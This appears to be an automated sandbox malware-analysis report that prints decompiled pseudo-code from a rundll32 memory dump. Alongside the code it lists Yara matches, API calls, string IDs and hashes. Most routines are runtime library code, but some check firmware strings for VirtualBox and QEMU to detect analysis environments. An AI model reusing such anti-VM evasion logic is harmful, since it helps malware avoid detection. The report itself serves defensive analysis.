                				_v96 = _t104;
                				_t68 = _t104;
                				_a32 = _t104;
                				if (_t112 == _t129) goto 0x535edf8f;
                				_v104 = _t76 - _t112;
                				_t131 = _t134 + 1;
                				if ( *((intOrPtr*)( *_t138 + _t131)) != dil) goto 0x535edf49;
                				_t132 = _t131 + 1;
                				E00007FFA7FFA535F1998(_t43, _t68, _t76, _t68, _t104 - _t68 + _a24, _t132);
                				if (_t68 != 0) goto 0x535edff4;
                				_t69 = _a32;
                				 *((long long*)(_v104 + _t138)) = _t69;
                				_a32 = _t69 + _t132;
                				if (_t138 + 8 != _t129) goto 0x535edf43;
                				r14d = _t44;
                				 *_a16 = _t76;
                				E00007FFA7FFA535E7E58(_a16, 0);
                				_t81 =  >  ? 0 : _t129 - _t112 + 7 >> 3;
                				if (_t81 == 0) goto 0x535edfd1;
                				E00007FFA7FFA535E7E58(_a16,  *_t112);
                				if (1 != _t81) goto 0x535edfbd;
                				E00007FFA7FFA535E7E58(_a16, _t112);
                				return r14d;
                			}



































                APIs
                • _invalid_parameter_noinfo.LIBCMT ref: 00007FFA535EDE30
                  • Part of subcall function 00007FFA535E8280: IsProcessorFeaturePresent.KERNEL32(00007FFA535EF385), ref: 00007FFA535E8289
                  • Part of subcall function 00007FFA535E8280: GetCurrentProcess.KERNEL32(00007FFA535EF385), ref: 00007FFA535E82AD
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
                • String ID: *?$.
                • API String ID: 4036615347-3972193922
                • Opcode ID: 6d596129e1decb9b41ca20d2be82681836e38efb530b16a80fb35605405d6583
                • Instruction ID: bdd56421e6d2085a6da203f47ace1649a748ade4d58a299038f3c52643143aa3
                • Opcode Fuzzy Hash: 6d596129e1decb9b41ca20d2be82681836e38efb530b16a80fb35605405d6583
                • Instruction Fuzzy Hash: 8A51D462B24F958DEB10DFA298104BC67AAEF99BD4B489171EE1D27B85EE3CD4419300
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 64%
                			E0000021521520614364(void* __edx, intOrPtr* __rax, long long __rbx, intOrPtr* __rcx, long long __rdx, long long _a8, void* _a16, long long _a24, intOrPtr _a26, long long _a32) {
                				long long _v72;
                				intOrPtr _v80;
                				void* _v88;
                				long long _v96;
                				long long _v104;
                				void* __rdi;
                				void* __rsi;
                				void* __rbp;
                				void* _t33;
                				void* _t37;
                				intOrPtr* _t66;
                				signed long long _t68;
                				long long _t70;
                				long long _t72;
                				long long _t78;
                				void* _t83;
                				void* _t90;
                				long long _t104;
                				long long _t108;
                				void* _t110;
                				intOrPtr* _t112;
                				void* _t114;
                				void* _t117;
                				intOrPtr _t129;
                				void* _t131;
                				void* _t132;
                				signed long long _t133;
                				signed long long _t134;
                				signed long long _t137;
                				intOrPtr* _t138;
                
                				_t66 = __rax;
                				_a8 = __rbx;
                				_a16 = __rdx;
                				if (__rdx != 0) goto 0x206143a0;
                				_t33 = E0000021521520603944(__rax);
                				_t3 = _t108 + 0x16; // 0x16
                				 *__rax = _t3;
                				E00000215215205FAABC(_t33);
                				goto 0x20614540;
                				asm("xorps xmm0, xmm0");
                				 *((long long*)(__rdx)) = _t108;
                				asm("movdqu [ebp-0x20], xmm0");
                				_v72 = _t108;
                				if ( *__rcx == _t108) goto 0x2061440b;
                				_a24 = 0x3f2a;
                				_a26 = dil;
                				E0000021521520618564( *__rcx,  &_a24);
                				if (_t66 != 0) goto 0x206143e2;
                				r8d = 0;
                				_t37 = E0000021521520614570(__rcx,  *__rcx,  &_a24, _t108, _t110, _t114, _t117,  &_v88);
                				goto 0x206143ee;
                				0x20614680();
                				r14d = _t37;
                				if (_t37 != 0) goto 0x206143fe;
                				goto 0x206143b2;
                				goto 0x20614504;
                				_t112 = _v88;
                				_t129 = _v80;
                				_a24 = _t108;
                				_t68 = _t129 - _t112;
                				_t137 = (_t68 >> 3) + 1;
                				_t90 =  >  ? _t108 : _t68 + 7 >> 3;
                				_t134 = _t133 | 0xffffffff;
                				if (_t90 == 0) goto 0x2061446d;
                				_t70 = _t134 + 1;
                				if ( *((intOrPtr*)( *_t112 + _t70)) != dil) goto 0x2061444e;
                				if (_t108 + 1 != _t90) goto 0x20614448;
                				_a24 = _t108 + 1 + _t70;
                				r8d = 1;
                				E000002152152060B1AC(_t137, _t108 + 1 + _t70, _t108 + 1);
                				_t78 = _t70;
                				if (_t70 == 0) goto 0x206144fd;
                				_t104 = _t70 + _t137 * 8;
                				_t138 = _t112;
                				_v96 = _t104;
                				_a32 = _t104;
                				if (_t112 == _t129) goto 0x206144f3;
                				_v104 = _t78 - _t112;
                				_t131 = _t134 + 1;
                				if ( *((intOrPtr*)( *_t138 + _t131)) != dil) goto 0x206144ad;
                				_t132 = _t131 + 1;
                				if (E000002152152060E758(0, _t104, _t78, _t104, _t104 - _t104 + _a24, _t132) != 0) goto 0x20614558;
                				_t72 = _a32;
                				 *((long long*)(_v104 + _t138)) = _t72;
                				_a32 = _t72 + _t132;
                				if (_t138 + 8 != _t129) goto 0x206144a7;
                				r14d = 0;
                				 *_a16 = _t78;
                				E000002152152060A780(_a16, _v104);
                				_t83 =  >  ? _t108 : _t129 - _t112 + 7 >> 3;
                				if (_t83 == 0) goto 0x20614535;
                				E000002152152060A780(_a16,  *_t112);
                				if (_t108 + 1 != _t83) goto 0x20614521;
                				E000002152152060A780(_a16, _t112);
                				return r14d;
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _invalid_parameter_noinfo
                • String ID: *?$.
                • API String ID: 3215553584-3972193922
                • Opcode ID: b6313b92dc4b6846cdc1b814fe81baf977d800061901388fa977b3311bbffbbb
                • Instruction ID: 437544f475a307cbec2cc56abe889066ec883c658066bc3363268af350b53bf1
                • Opcode Fuzzy Hash: b6313b92dc4b6846cdc1b814fe81baf977d800061901388fa977b3311bbffbbb
                • Instruction Fuzzy Hash: 8E51D677712FA4C6EF20DFA698047D9A7A5FBA4BD8F644521DE1917F89DA38D0428300
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: IPCA$VBOX$VirtualBox$vbox
                • API String ID: 0-3862313162
                • Opcode ID: 47845e2aecfa603fbafa9a6dc2591582b08ae3cee287e98bf503f113d7325852
                • Instruction ID: bcacbeeeb12c6f827a666a5ffe59d668b8094885312e506c45e4b073fd831d14
                • Opcode Fuzzy Hash: 47845e2aecfa603fbafa9a6dc2591582b08ae3cee287e98bf503f113d7325852
                • Instruction Fuzzy Hash: 7131C933312A60C1F7109B12A8093EA67D5FFE5BF4F080551DE4997B9DEA38D551C740
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 45%
                			E00000215215205CDFD0(void* __rax, long long __rbx, long long __rsi, char _a8, long long _a16, long long _a24) {
                				void* __rdi;
                				intOrPtr _t23;
                				long long _t29;
                				void* _t35;
                				void* _t39;
                				void* _t47;
                
                				_t37 = __rsi;
                				_t29 = __rbx;
                				_a24 = __rbx;
                				_a8 = 0;
                				E00000215215205D0670(0x52534d42, 0, _t39,  &_a8);
                				if (__rax == 0) goto 0x205ce05f;
                				_a16 = __rsi;
                				_t23 = _a8;
                				r9d = _t23;
                				if (E00000215215205D0570(__rax, __rbx, "VirtualBox", _t35, __rax, __rsi, _t39, __rax, _t47) != 0) goto 0x205ce04d;
                				r9d = _t23;
                				if (E00000215215205D0570(E00000215215205D0570(__rax, __rbx, "VirtualBox", _t35, __rax, __rsi, _t39, __rax, _t47), _t29, "vbox", _t35, __rax, _t37, _t39, __rax, _t47) != 0) goto 0x205ce04d;
                				r9d = _t23;
                				if (E00000215215205D0570(E00000215215205D0570(E00000215215205D0570(__rax, __rbx, "VirtualBox", _t35, __rax, __rsi, _t39, __rax, _t47), _t29, "vbox", _t35, __rax, _t37, _t39, __rax, _t47), _t29, "VBOX", _t35, __rax, _t37, _t39, __rax, _t47) == 0) goto 0x205ce052;
                				0x205faea4();
                				return 1;
                			}

                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: BMSR$VBOX$VirtualBox$vbox
                • API String ID: 0-728286360
                • Opcode ID: 6bc41bc5affd39c8044c21b24d9e8814d90c21f9f28bd368c3ec2090da186f7d
                • Instruction ID: 5e96f9310bd485b58578a7ad63b3df2d8f18f08476430e59b027c80f82cc5d3f
                • Opcode Fuzzy Hash: 6bc41bc5affd39c8044c21b24d9e8814d90c21f9f28bd368c3ec2090da186f7d
                • Instruction Fuzzy Hash: 5E01C833313A90C1E750DB12F5886E96795EFE4BD4F046065AE099BB4EEA74C945C780
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 52%
                			E0000021521520611B70(void* __ecx, signed int __edx, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long _a16, long long _a24) {
                				void* _v24;
                				signed int _v40;
                				char _v280;
                				signed int _t47;
                				int _t48;
                				void* _t50;
                				void* _t55;
                				signed int _t70;
                				signed int _t76;
                				signed int _t81;
                				signed long long _t115;
                				signed long long _t116;
                				void* _t121;
                				signed int* _t142;
                				intOrPtr* _t144;
                				void* _t146;
                				void* _t154;
                				signed long long _t156;
                				signed long long _t157;
                
                				_t123 = __rcx;
                				_t81 = __edx;
                				_a16 = __rbx;
                				_a24 = __rsi;
                				_t115 =  *0x2067c720; // 0xca1645d940e
                				_t116 = _t115 ^ _t146 - 0x00000120;
                				_v40 = _t116;
                				_t121 = __rcx;
                				E000002152152060C334(_t116, __rcx, __rcx, __rdx, _t154);
                				_t4 = _t116 + 0x98; // 0x98
                				_t144 = _t4;
                				E000002152152060C334(_t116, _t121, _t123, __rdx, _t154);
                				_t142 =  *((intOrPtr*)(_t116 + 0x3a0));
                				_t47 = E0000021521520611EB0(_t121, __rdx);
                				r9d = 0x78;
                				_t70 = _t47;
                				asm("sbb edx, edx");
                				_t48 = GetLocaleInfoW(??, ??, ??, ??);
                				r15d = 0;
                				if (_t48 != 0) goto 0x20611bf7;
                				 *_t142 = r15d;
                				goto 0x20611d8b;
                				_t50 = E00000215215206019F0(_t116,  *((intOrPtr*)(_t144 + 8)),  &_v280);
                				_t157 = _t156 | 0xffffffff;
                				if (_t50 != 0) goto 0x20611cc3;
                				r9d = _t157 + 0x79;
                				asm("sbb edx, edx");
                				if (GetLocaleInfoW(??, ??, ??, ??) == 0) goto 0x20611bea;
                				if (E00000215215206019F0(_t116,  *_t144,  &_v280) != 0) goto 0x20611c55;
                				 *_t142 =  *_t142 | 0x00000304;
                				_t142[1] = _t70;
                				goto 0x20611cc0;
                				if (( *_t142 & 0x00000002) != 0) goto 0x20611cc3;
                				if ( *((intOrPtr*)(_t144 + 0x14)) == r15d) goto 0x20611c95;
                				_t55 = E0000021521520616E48(((_t81 & 0xfffff005) + 0x00001002 & 0xfffff002) + 0x1001, _t116,  *_t144,  *((intOrPtr*)(_t144 + 0x14)));
                				if (_t55 != 0) goto 0x20611c95;
                				 *_t142 =  *_t142 | 0x00000002;
                				_t142[2] = _t70;
                				if ( *((intOrPtr*)( *_t144 + (_t157 + 1) * 2)) != r15w) goto 0x20611c81;
                				if (_t55 !=  *((intOrPtr*)(_t144 + 0x14))) goto 0x20611cc3;
                				_t142[1] = _t70;
                				goto 0x20611cc3;
                				_t76 =  *_t142;
                				if ((_t76 & 0x00000001) != 0) goto 0x20611cc3;
                				r8d = r15d;
                				if (_t70 ==  *0x20635b40) goto 0x20611cc3;
                				r8d = r8d + 1;
                				if (r8d - 0xa < 0) goto 0x20611ca6;
                				 *_t142 = _t76 | 0x00000001;
                				_t142[2] = _t70;
                				if (( *_t142 & 0x00000300) == 0x300) goto 0x20611d81;
                				r9d = 0x78;
                				asm("sbb edx, edx");
                				if (GetLocaleInfoW(??, ??, ??, ??) == 0) goto 0x20611bea;
                				if (E00000215215206019F0(r8d,  *_t144,  &_v280) != 0) goto 0x20611d47;
                				asm("bts dword [edi], 0x9");
                				if ( *((intOrPtr*)(_t144 + 0x18)) == r15d) goto 0x20611d27;
                				asm("bts eax, 0x8");
                				goto 0x20611d78;
                				if ( *((intOrPtr*)(_t144 + 0x14)) == r15d) goto 0x20611d1f;
                				if ( *((intOrPtr*)( *_t144 + (_t157 + 1) * 2)) != r15w) goto 0x20611d30;
                				if (r14d !=  *((intOrPtr*)(_t144 + 0x14))) goto 0x20611d1f;
                				goto 0x20611d66;
                				if ( *((intOrPtr*)(_t144 + 0x18)) != r15d) goto 0x20611d81;
                				if ( *((intOrPtr*)(_t144 + 0x14)) == r15d) goto 0x20611d81;
                				if (E00000215215206019F0(r8d,  *_t144,  &_v280) != 0) goto 0x20611d81;
                				if (E0000021521520611FB0(_t70, 0, r8d, _t121,  *_t144,  &_v280, _t144, _t154) == 0) goto 0x20611d81;
                				asm("bts dword [edi], 0x8");
                				if (_t142[1] != r15d) goto 0x20611d81;
                				_t142[1] = _t70;
                				return E00000215215205F59D0(_t70, _v40 ^ _t146 - 0x00000120,  &_v280, _t154);
                			}

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ErrorInfoLastLocale$abort
                • String ID:
                • API String ID: 1112924360-0
                • Opcode ID: 876a2f0e40750921915cb54671a1db037061437716535c8cda6411e3dd0adf72
                • Instruction ID: ae4de1ab34326410330e1d4bac6b88d3f9cb59df71ade43c5edde196461b4bb6
                • Opcode Fuzzy Hash: 876a2f0e40750921915cb54671a1db037061437716535c8cda6411e3dd0adf72
                • Instruction Fuzzy Hash: 4361CF73602A51C6EF348F21E5847A9B3E1FBE4740F208165DF9A8B798DB38E951C740
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 36%
                			E00000215215205CF080(void* __rax, long long __rbx, long long __rsi, char _a8, long long _a16, long long _a24) {
                				void* __rdi;
                				intOrPtr _t20;
                				long long _t25;
                				void* _t30;
                				void* _t34;
                				void* _t41;
                
                				_t32 = __rsi;
                				_t25 = __rbx;
                				_a24 = __rbx;
                				_a8 = 0;
                				E00000215215205D0670(0x52534d42, 0, _t34,  &_a8);
                				if (__rax == 0) goto 0x205cf0f6;
                				_a16 = __rsi;
                				_t20 = _a8;
                				r9d = _t20;
                				if (E00000215215205D0570(__rax, __rbx, "qemu", _t30, __rax, __rsi, _t34, __rax, _t41) != 0) goto 0x205cf0e4;
                				r9d = _t20;
                				if (E00000215215205D0570(E00000215215205D0570(__rax, __rbx, "qemu", _t30, __rax, __rsi, _t34, __rax, _t41), _t25, "QEMU", _t30, __rax, _t32, _t34, __rax, _t41) == 0) goto 0x205cf0e9;
                				0x205faea4();
                				return 1;
                			}

                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: BMSR$QEMU$qemu
                • API String ID: 0-2187671315
                • Opcode ID: 16cc9900deff68e23b318fd9eb873e914e0238ac6f3777cc6376dae7b2047408
                • Instruction ID: 8c05e050ebd75aaf072e556eafe7fdf0e0460a3198680117fe3d7674a7647b97
                • Opcode Fuzzy Hash: 16cc9900deff68e23b318fd9eb873e914e0238ac6f3777cc6376dae7b2047408
                • Instruction Fuzzy Hash: EF01F733312A90C2EB50DB52F1886E96790EFE8BC4F045066BF465BB4EEA34C904C740
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 15%
                			E000002152152060CB80(void* __edx, void* __eflags, long long __rbx, void* __rcx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* _a8, void* _a16, void* _a24, void* _a32) {
                				void* _t20;
                				long long* _t25;
                				long long* _t41;
                				void* _t49;
                				void* _t50;
                
                				_t25 = _t41;
                				 *((long long*)(_t25 + 8)) = __rbx;
                				 *((long long*)(_t25 + 0x10)) = __rbp;
                				 *((long long*)(_t25 + 0x18)) = __rsi;
                				 *((long long*)(_t25 + 0x20)) = __rdi;
                				_t20 = r9d;
                				_t50 = __rcx;
                				E000002152152060C60C(0xd, __rbx, "GetLocaleInfoEx", __r8, 0x20634518, 0x20634520);
                				if (_t25 == 0) goto 0x2060cbe3;
                				 *0x20627698();
                				r9d = _t20;
                				 *_t25();
                				goto 0x2060cbfd;
                				E000002152152060CFFC(0, 0, _t25, _t25, _t50, __r8, _t49);
                				r9d = _t20;
                				return GetLocaleInfoW(??, ??, ??, ??);
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: InfoLocale
                • String ID: GetLocaleInfoEx
                • API String ID: 2299586839-2904428671
                • Opcode ID: a0d5fb43beda45df5dbd3d69508ff1f01683c1bc917df208328e2df5b01cd096
                • Instruction ID: b4e1698151c96fbcd2fa90c120d0f8e05fd9fabaa8173941800dc4b660773a51
                • Opcode Fuzzy Hash: a0d5fb43beda45df5dbd3d69508ff1f01683c1bc917df208328e2df5b01cd096
                • Instruction Fuzzy Hash: 6001D832712F64C6E6249F57A4046C5B7A6FFE8FD0F244056DE0913B59DE38E546C340
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 61%
                			E0000021521520592270(void* __eax, void* __ecx, void* __edx, void* __eflags, long long __rbx, void* __rcx, void* __rdx, long long _a8, unsigned long long _a24, unsigned long long _a32, signed int* _a40) {
                				long long _v56;
                				unsigned long long _v64;
                				unsigned long long _v72;
                				long long _v88;
                				long long _v96;
                				long long _v104;
                				unsigned long long _t66;
                				void* _t109;
                				signed int _t110;
                				signed int _t111;
                				signed int _t112;
                				void* _t123;
                				unsigned long long _t142;
                				unsigned long long _t149;
                				unsigned long long _t155;
                				unsigned long long _t169;
                				void* _t172;
                				signed int* _t175;
                				signed long long _t181;
                				signed long long _t185;
                				unsigned long long _t193;
                				unsigned long long _t194;
                				unsigned long long _t195;
                				unsigned long long _t198;
                				void* _t205;
                				void* _t206;
                				long long _t210;
                
                				_t109 = __ecx;
                				_a8 = __rbx;
                				_a32 = r9d;
                				r15d = 0;
                				_t142 =  &_a24;
                				_v88 = _t210;
                				_v96 = _t210;
                				_v104 = _t142;
                				_a32 = r15d;
                				_a24 = r15d;
                				__imp__WSARecv();
                				_t123 = __eax;
                				_t66 = E000002152152058F380(__rcx, __rdx);
                				_t193 = _t142;
                				__imp__#111();
                				_v72 = _t142;
                				_v64 = _t142;
                				if ( *((intOrPtr*)(_t193 + 8)) + 0xda812030 - 1 <= 0) goto 0x205922f1;
                				 *((intOrPtr*)( *_t193 + 0x30))();
                				goto 0x205922f6;
                				_v72 = _t66;
                				_t175 = _a40;
                				_v64 = _t193;
                				asm("movups xmm0, [ebp-0x20]");
                				_v56 = _t142 + 2;
                				asm("movsd xmm1, [ebp-0x10]");
                				asm("movups [ebx], xmm0");
                				asm("movsd [ebx+0x10], xmm1");
                				if (_t175[4] == 1) goto 0x20592335;
                				goto 0x2059235f;
                				_t181 = _t175[2];
                				_t149 = (_t181 - __rdx >> 1) + __rdx >> 0x14;
                				_t110 = _t109 -  *_t175 * _t181 * 0x1ffff7;
                				if (_t110 * 0x3e8 +  *_t175 != 0x40) goto 0x205923a6;
                				E000002152152058F380(_t181, __rdx);
                				_t194 = _t149;
                				_v72 = _t149;
                				_v64 = _t149;
                				if ( *((intOrPtr*)(_t194 + 8)) + 0xda812030 - 1 <= 0) goto 0x2059239b;
                				_t205 =  *_t194;
                				 *((intOrPtr*)(_t205 + 0x30))();
                				_v72 = 0x2746;
                				goto 0x2059241a;
                				_v72 = 0x2746;
                				goto 0x2059241a;
                				if (_t205 == 1) goto 0x205923b0;
                				goto 0x205923da;
                				_t185 = _t175[2];
                				_t155 = (_t185 - __rdx >> 1) + __rdx >> 0x14;
                				_t111 = _t110 -  *_t175 * _t185 * 0x1ffff7;
                				if (_t111 * 0x3e8 +  *_t175 != 0x4d2) goto 0x2059243c;
                				E000002152152058F380(_t185, __rdx);
                				_t195 = _t155;
                				_v72 = _t155;
                				_v64 = _t155;
                				if ( *((intOrPtr*)(_t195 + 8)) + 0xda812030 - 1 <= 0) goto 0x20592411;
                				_t206 =  *_t195;
                				 *((intOrPtr*)(_t206 + 0x30))();
                				goto 0x20592413;
                				_v72 = 0x274d;
                				_v64 = _t195;
                				asm("movups xmm0, [ebp-0x20]");
                				_v56 = _t155 + 2;
                				asm("movsd xmm1, [ebp-0x10]");
                				asm("movups [ebx], xmm0");
                				asm("movsd [ebx+0x10], xmm1");
                				goto 0x205924b2;
                				if (_t206 == 1) goto 0x20592446;
                				goto 0x20592470;
                				_t112 = _t111 -  *_t175 * _t175[2] * 0x1ffff7;
                				if (_t112 * 0x3e8 +  *_t175 == 0x2738) goto 0x205924bb;
                				if (_t206 == 1) goto 0x20592481;
                				goto 0x205924ab;
                				if ((_t112 -  *_t175 * _t175[2] * 0x1ffff7) * 0x3e8 +  *_t175 == 0xea) goto 0x205924bb;
                				if (_t123 == 0) goto 0x205924bb;
                				goto 0x2059252f;
                				_t169 = _t175[4];
                				if (_t169 != 0) goto 0x205924ce;
                				E000002152152058F380(_t175[2], __rdx);
                				goto 0x205924e2;
                				if (_t169 != 1) goto 0x205924de;
                				E000002152152058FD30(_t175[2], __rdx);
                				goto 0x205924e2;
                				_t198 = _t175[2];
                				_v72 = _t169;
                				_v64 = _t169;
                				if ( *((intOrPtr*)(_t198 + 8)) + 0xda812030 - 1 <= 0) goto 0x20592506;
                				_t172 =  *_t198;
                				 *((intOrPtr*)(_t172 + 0x30))();
                				goto 0x20592508;
                				_v72 = r15d;
                				_v56 = _t172 + 2;
                				asm("movsd xmm1, [ebp-0x10]");
                				_v64 = _t198;
                				asm("movups xmm0, [ebp-0x20]");
                				asm("movups [ebx], xmm0");
                				asm("movsd [ebx+0x10], xmm1");
                				return _a32;
                			}































                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLastRecv
                • String ID:
                • API String ID: 904507345-0
                • Opcode ID: 5ae351c8fb2f803753a3d141a4413ee28ef43bae491a8bcf9652c8dbddf81f5b
                • Instruction ID: a877514e715af296757682adfe24b98697a7fd4ed2c8ec8062b184a42a3c35ae
                • Opcode Fuzzy Hash: 5ae351c8fb2f803753a3d141a4413ee28ef43bae491a8bcf9652c8dbddf81f5b
                • Instruction Fuzzy Hash: E281AC73B12F58CAEF14CF75D5892AC23A4FBA9788F104525CE4D97788DB38D1918780
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 67%
                			E0000021521520611DB4(void* __ecx, void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long _a16, long long _a24) {
                				void* _v8;
                				signed int _v24;
                				char _v264;
                				signed int _t22;
                				signed int _t23;
                				void* _t25;
                				signed int _t33;
                				signed long long _t52;
                				signed long long _t53;
                				void* _t55;
                				signed int* _t66;
                				intOrPtr* _t68;
                				void* _t70;
                				void* _t75;
                
                				_t57 = __rcx;
                				_a16 = __rbx;
                				_a24 = __rsi;
                				_t52 =  *0x2067c720; // 0xca1645d940e
                				_t53 = _t52 ^ _t70 - 0x00000120;
                				_v24 = _t53;
                				_t55 = __rcx;
                				E000002152152060C334(_t53, __rcx, __rcx, __rdx, _t75);
                				_t4 = _t53 + 0x98; // 0x98
                				_t68 = _t4;
                				E000002152152060C334(_t53, _t55, _t57, __rdx, _t75);
                				_t66 =  *((intOrPtr*)(_t53 + 0x3a0));
                				_t22 = E0000021521520611EB0(_t55, __rdx);
                				r9d = 0x78;
                				_t33 = _t22;
                				asm("sbb edx, edx");
                				_t23 = GetLocaleInfoW(??, ??, ??, ??);
                				if (_t23 != 0) goto 0x20611e30;
                				 *_t66 =  *_t66 & _t23;
                				goto 0x20611e8b;
                				_t25 = E00000215215206019F0(_t53,  *_t68,  &_v264);
                				if (_t25 != 0) goto 0x20611e4b;
                				if ( *((intOrPtr*)(_t68 + 0x18)) != _t25) goto 0x20611e78;
                				goto 0x20611e6a;
                				if ( *((intOrPtr*)(_t68 + 0x18)) != 0) goto 0x20611e81;
                				if ( *((intOrPtr*)(_t68 + 0x14)) == 0) goto 0x20611e81;
                				if (E00000215215206019F0(_t53,  *_t68,  &_v264) != 0) goto 0x20611e81;
                				if (E0000021521520611FB0(_t33, 0, _t53, _t55,  *_t68,  &_v264, _t68, _t75) == 0) goto 0x20611e81;
                				 *_t66 =  *_t66 | 0x00000004;
                				_t66[1] = _t33;
                				_t66[2] = _t33;
                				return E00000215215205F59D0(_t33, _v24 ^ _t70 - 0x00000120,  &_v264, _t75);
                			}


















                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast$InfoLocaleabort
                • String ID:
                • API String ID: 3293382891-0
                • Opcode ID: c3ee6eff638805c46cfdc8a03d65015ce6c4ae2625ed1d2e05411732f31b83ad
                • Instruction ID: 43878149dc92cf33e0ed6a23aa57ecb31ba8d30ea3a363e3afe4989111a03895
                • Opcode Fuzzy Hash: c3ee6eff638805c46cfdc8a03d65015ce6c4ae2625ed1d2e05411732f31b83ad
                • Instruction Fuzzy Hash: 7D21A233601A90CAEF34CB21E4493DAB7A1FBE8780F6481659F898779ADF38E545C740
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 45%
                			E0000021521520611A08(void* __ecx, void* __edx, void* __rax, long long __rbx, signed int* __rcx, void* __rdx, signed int __r8, void* __r9, long long _a8) {
                				signed int _t35;
                				signed char _t36;
                				signed char _t37;
                				signed int _t52;
                				void* _t54;
                				signed int* _t58;
                				signed short** _t65;
                				signed long long _t70;
                				signed long long _t71;
                				signed long long _t74;
                
                				_t54 = __rax;
                				_a8 = __rbx;
                				_t58 = __rcx;
                				E000002152152060C334(__rax, __rcx, __rcx, __rdx, __r9);
                				_t70 = __r8 | 0xffffffff;
                				_t2 = _t54 + 0x98; // 0x98
                				_t65 = _t2;
                				_t74 = _t70 + 1;
                				if (( *_t65)[_t74] != 0) goto 0x20611a2d;
                				_t65[3] = 0 | _t74 == 0x00000003;
                				_t71 = _t70 + 1;
                				if (_t65[1][_t71] != 0) goto 0x20611a47;
                				r8d = 2;
                				_t65[3] = 0 | _t71 == 0x00000003;
                				_t58[1] = 0;
                				if (_t65[3] != 0) goto 0x20611a96;
                				r10d = 0;
                				r9d =  *( *_t65) & 0x0000ffff;
                				_t16 = _t74 - 0x41; // 0x58
                				if (_t16 - 0x19 <= 0) goto 0x20611a8e;
                				r9w = r9w - 0x61;
                				if (r9w - 0x19 > 0) goto 0x20611a93;
                				r10d =  &(r10d[0]);
                				goto 0x20611a71;
                				r8d = r10d;
                				_t65[2] = r8d;
                				_t35 = EnumSystemLocalesW(??, ??);
                				_t52 =  *_t58 & 0x00000007;
                				asm("bt ecx, 0x9");
                				_t36 = _t35 & 0xffffff00 | _t52 > 0x00000000;
                				asm("bt ecx, 0x8");
                				_t37 = _t36 & 0xffffff00 | _t52 > 0x00000000;
                				if ((_t37 & (0 | _t52 != 0x00000000) & _t36) != 0) goto 0x20611aca;
                				 *_t58 = 0;
                				return _t37;
                			}














                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
